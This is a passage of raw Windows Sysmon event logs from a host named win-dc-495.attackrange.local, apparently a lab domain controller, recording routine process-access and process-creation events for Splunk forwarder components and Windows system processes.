10341000x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.722{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.190{59A5CD1D-9094-6005-2001-00000000A301}36762120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 